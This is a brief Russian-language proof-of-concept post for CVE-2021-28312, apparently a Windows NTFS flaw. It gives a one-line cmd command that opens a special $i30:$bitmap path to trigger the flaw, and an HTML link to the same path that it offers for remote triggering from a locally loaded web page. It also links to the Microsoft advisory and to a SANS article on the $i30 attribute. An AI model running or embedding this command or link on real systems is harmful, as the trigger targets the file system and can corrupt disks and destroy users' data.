
POC и описание для CVE-2021-28312
POC и описание для CVE-2021-28312
Ссылка: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28312
В командной строке (cmd): выполните следующую команду cd c:\:$i30:$bitmap
Возможность удалённой эксплуатации: это можно сделать, добавив следующую ссылку на локально загруженную страницу
<a href="file:\\c:\:$i30:$bitmap">Click here</a>
Подробнее об атрибуте $i30: https://www.sans.org/blog/ntfs-i30-index-attributes-evidence-of-deleted-and-overwritten-files/